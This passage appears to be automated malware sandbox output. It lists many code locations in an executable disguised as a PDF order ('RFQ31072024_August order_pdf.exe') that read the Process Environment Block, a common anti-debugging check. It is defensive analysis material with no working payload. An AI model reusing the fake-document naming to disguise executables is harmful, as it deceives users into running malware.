Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D07AF mov eax, dword ptr fs:[00000030h]	7_2_015D07AF
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A660 mov eax, dword ptr fs:[00000030h]	7_2_0160A660
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A660 mov eax, dword ptr fs:[00000030h]	7_2_0160A660
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169866E mov eax, dword ptr fs:[00000030h]	7_2_0169866E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169866E mov eax, dword ptr fs:[00000030h]	7_2_0169866E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01602674 mov eax, dword ptr fs:[00000030h]	7_2_01602674
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EC640 mov eax, dword ptr fs:[00000030h]	7_2_015EC640
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01606620 mov eax, dword ptr fs:[00000030h]	7_2_01606620
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01608620 mov eax, dword ptr fs:[00000030h]	7_2_01608620
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E260B mov eax, dword ptr fs:[00000030h]	7_2_015E260B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E609 mov eax, dword ptr fs:[00000030h]	7_2_0164E609
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D262C mov eax, dword ptr fs:[00000030h]	7_2_015D262C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01612619 mov eax, dword ptr fs:[00000030h]	7_2_01612619
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015EE627 mov eax, dword ptr fs:[00000030h]	7_2_015EE627
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016506F1 mov eax, dword ptr fs:[00000030h]	7_2_016506F1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016506F1 mov eax, dword ptr fs:[00000030h]	7_2_016506F1
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	7_2_0164E6F2
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	7_2_0164E6F2
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	7_2_0164E6F2
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E6F2 mov eax, dword ptr fs:[00000030h]	7_2_0164E6F2
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0160A6C7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0160A6C7
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0160C6A6
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4690 mov eax, dword ptr fs:[00000030h]	7_2_015D4690
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4690 mov eax, dword ptr fs:[00000030h]	7_2_015D4690
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016066B0 mov eax, dword ptr fs:[00000030h]	7_2_016066B0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0161096E mov eax, dword ptr fs:[00000030h]	7_2_0161096E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0161096E mov edx, dword ptr fs:[00000030h]	7_2_0161096E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0161096E mov eax, dword ptr fs:[00000030h]	7_2_0161096E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165C97C mov eax, dword ptr fs:[00000030h]	7_2_0165C97C
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01674978 mov eax, dword ptr fs:[00000030h]	7_2_01674978
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01674978 mov eax, dword ptr fs:[00000030h]	7_2_01674978
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01650946 mov eax, dword ptr fs:[00000030h]	7_2_01650946
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F6962 mov eax, dword ptr fs:[00000030h]	7_2_015F6962
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F6962 mov eax, dword ptr fs:[00000030h]	7_2_015F6962
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F6962 mov eax, dword ptr fs:[00000030h]	7_2_015F6962
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C8918 mov eax, dword ptr fs:[00000030h]	7_2_015C8918
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015C8918 mov eax, dword ptr fs:[00000030h]	7_2_015C8918
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0166892B mov eax, dword ptr fs:[00000030h]	7_2_0166892B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165892A mov eax, dword ptr fs:[00000030h]	7_2_0165892A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E908 mov eax, dword ptr fs:[00000030h]	7_2_0164E908
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164E908 mov eax, dword ptr fs:[00000030h]	7_2_0164E908
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165C912 mov eax, dword ptr fs:[00000030h]	7_2_0165C912
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165E9E0 mov eax, dword ptr fs:[00000030h]	7_2_0165E9E0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	7_2_015DA9D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	7_2_015DA9D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	7_2_015DA9D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	7_2_015DA9D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	7_2_015DA9D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DA9D0 mov eax, dword ptr fs:[00000030h]	7_2_015DA9D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016029F9 mov eax, dword ptr fs:[00000030h]	7_2_016029F9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016029F9 mov eax, dword ptr fs:[00000030h]	7_2_016029F9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016669C0 mov eax, dword ptr fs:[00000030h]	7_2_016669C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016049D0 mov eax, dword ptr fs:[00000030h]	7_2_016049D0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169A9D3 mov eax, dword ptr fs:[00000030h]	7_2_0169A9D3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016589B3 mov esi, dword ptr fs:[00000030h]	7_2_016589B3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016589B3 mov eax, dword ptr fs:[00000030h]	7_2_016589B3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016589B3 mov eax, dword ptr fs:[00000030h]	7_2_016589B3
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D09AD mov eax, dword ptr fs:[00000030h]	7_2_015D09AD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D09AD mov eax, dword ptr fs:[00000030h]	7_2_015D09AD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E29A0 mov eax, dword ptr fs:[00000030h]	7_2_015E29A0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4859 mov eax, dword ptr fs:[00000030h]	7_2_015D4859
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D4859 mov eax, dword ptr fs:[00000030h]	7_2_015D4859
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01666870 mov eax, dword ptr fs:[00000030h]	7_2_01666870
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01666870 mov eax, dword ptr fs:[00000030h]	7_2_01666870
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165E872 mov eax, dword ptr fs:[00000030h]	7_2_0165E872
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165E872 mov eax, dword ptr fs:[00000030h]	7_2_0165E872
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E2840 mov ecx, dword ptr fs:[00000030h]	7_2_015E2840
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01600854 mov eax, dword ptr fs:[00000030h]	7_2_01600854
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160A830 mov eax, dword ptr fs:[00000030h]	7_2_0160A830
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167483A mov eax, dword ptr fs:[00000030h]	7_2_0167483A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167483A mov eax, dword ptr fs:[00000030h]	7_2_0167483A
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2835 mov eax, dword ptr fs:[00000030h]	7_2_015F2835
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2835 mov eax, dword ptr fs:[00000030h]	7_2_015F2835
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2835 mov eax, dword ptr fs:[00000030h]	7_2_015F2835
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2835 mov ecx, dword ptr fs:[00000030h]	7_2_015F2835
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2835 mov eax, dword ptr fs:[00000030h]	7_2_015F2835
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F2835 mov eax, dword ptr fs:[00000030h]	7_2_015F2835
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165C810 mov eax, dword ptr fs:[00000030h]	7_2_0165C810
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169A8E4 mov eax, dword ptr fs:[00000030h]	7_2_0169A8E4
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0160C8F9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160C8F9 mov eax, dword ptr fs:[00000030h]	7_2_0160C8F9
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FE8C0 mov eax, dword ptr fs:[00000030h]	7_2_015FE8C0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0887 mov eax, dword ptr fs:[00000030h]	7_2_015D0887
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165C89D mov eax, dword ptr fs:[00000030h]	7_2_0165C89D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015CCB7E mov eax, dword ptr fs:[00000030h]	7_2_015CCB7E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01684B4B mov eax, dword ptr fs:[00000030h]	7_2_01684B4B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01684B4B mov eax, dword ptr fs:[00000030h]	7_2_01684B4B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01678B42 mov eax, dword ptr fs:[00000030h]	7_2_01678B42
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01666B40 mov eax, dword ptr fs:[00000030h]	7_2_01666B40
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01666B40 mov eax, dword ptr fs:[00000030h]	7_2_01666B40
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0169AB40 mov eax, dword ptr fs:[00000030h]	7_2_0169AB40
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167EB50 mov eax, dword ptr fs:[00000030h]	7_2_0167EB50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01698B28 mov eax, dword ptr fs:[00000030h]	7_2_01698B28
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01698B28 mov eax, dword ptr fs:[00000030h]	7_2_01698B28
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164EB1D mov eax, dword ptr fs:[00000030h]	7_2_0164EB1D
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FEB20 mov eax, dword ptr fs:[00000030h]	7_2_015FEB20
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FEB20 mov eax, dword ptr fs:[00000030h]	7_2_015FEB20
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0BCD mov eax, dword ptr fs:[00000030h]	7_2_015D0BCD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0BCD mov eax, dword ptr fs:[00000030h]	7_2_015D0BCD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0BCD mov eax, dword ptr fs:[00000030h]	7_2_015D0BCD
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F0BCB mov eax, dword ptr fs:[00000030h]	7_2_015F0BCB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F0BCB mov eax, dword ptr fs:[00000030h]	7_2_015F0BCB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F0BCB mov eax, dword ptr fs:[00000030h]	7_2_015F0BCB
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165CBF0 mov eax, dword ptr fs:[00000030h]	7_2_0165CBF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FEBFC mov eax, dword ptr fs:[00000030h]	7_2_015FEBFC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8BF0 mov eax, dword ptr fs:[00000030h]	7_2_015D8BF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8BF0 mov eax, dword ptr fs:[00000030h]	7_2_015D8BF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8BF0 mov eax, dword ptr fs:[00000030h]	7_2_015D8BF0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167EBD0 mov eax, dword ptr fs:[00000030h]	7_2_0167EBD0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01684BB0 mov eax, dword ptr fs:[00000030h]	7_2_01684BB0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01684BB0 mov eax, dword ptr fs:[00000030h]	7_2_01684BB0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0BBE mov eax, dword ptr fs:[00000030h]	7_2_015E0BBE
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0BBE mov eax, dword ptr fs:[00000030h]	7_2_015E0BBE
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0A5B mov eax, dword ptr fs:[00000030h]	7_2_015E0A5B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015E0A5B mov eax, dword ptr fs:[00000030h]	7_2_015E0A5B
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0167EA60 mov eax, dword ptr fs:[00000030h]	7_2_0167EA60
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D6A50 mov eax, dword ptr fs:[00000030h]	7_2_015D6A50
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160CA6F mov eax, dword ptr fs:[00000030h]	7_2_0160CA6F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160CA6F mov eax, dword ptr fs:[00000030h]	7_2_0160CA6F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160CA6F mov eax, dword ptr fs:[00000030h]	7_2_0160CA6F
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164CA72 mov eax, dword ptr fs:[00000030h]	7_2_0164CA72
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0164CA72 mov eax, dword ptr fs:[00000030h]	7_2_0164CA72
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160CA24 mov eax, dword ptr fs:[00000030h]	7_2_0160CA24
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160CA38 mov eax, dword ptr fs:[00000030h]	7_2_0160CA38
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F4A35 mov eax, dword ptr fs:[00000030h]	7_2_015F4A35
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015F4A35 mov eax, dword ptr fs:[00000030h]	7_2_015F4A35
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015FEA2E mov eax, dword ptr fs:[00000030h]	7_2_015FEA2E
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0165CA11 mov eax, dword ptr fs:[00000030h]	7_2_0165CA11
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0AD0 mov eax, dword ptr fs:[00000030h]	7_2_015D0AD0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160AAEE mov eax, dword ptr fs:[00000030h]	7_2_0160AAEE
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_0160AAEE mov eax, dword ptr fs:[00000030h]	7_2_0160AAEE
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01626ACC mov eax, dword ptr fs:[00000030h]	7_2_01626ACC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01626ACC mov eax, dword ptr fs:[00000030h]	7_2_01626ACC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01626ACC mov eax, dword ptr fs:[00000030h]	7_2_01626ACC
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01604AD0 mov eax, dword ptr fs:[00000030h]	7_2_01604AD0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01604AD0 mov eax, dword ptr fs:[00000030h]	7_2_01604AD0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01626AA4 mov eax, dword ptr fs:[00000030h]	7_2_01626AA4
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015DEA80 mov eax, dword ptr fs:[00000030h]	7_2_015DEA80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_016A4A80 mov eax, dword ptr fs:[00000030h]	7_2_016A4A80
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_01608A90 mov edx, dword ptr fs:[00000030h]	7_2_01608A90
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8AA0 mov eax, dword ptr fs:[00000030h]	7_2_015D8AA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8AA0 mov eax, dword ptr fs:[00000030h]	7_2_015D8AA0
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0D59 mov eax, dword ptr fs:[00000030h]	7_2_015D0D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0D59 mov eax, dword ptr fs:[00000030h]	7_2_015D0D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D0D59 mov eax, dword ptr fs:[00000030h]	7_2_015D0D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8D59 mov eax, dword ptr fs:[00000030h]	7_2_015D8D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8D59 mov eax, dword ptr fs:[00000030h]	7_2_015D8D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8D59 mov eax, dword ptr fs:[00000030h]	7_2_015D8D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8D59 mov eax, dword ptr fs:[00000030h]	7_2_015D8D59
Source: C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe	Code function: 7_2_015D8D59 mov eax, dword ptr fs:[00000030h]	7_2_015D8D59
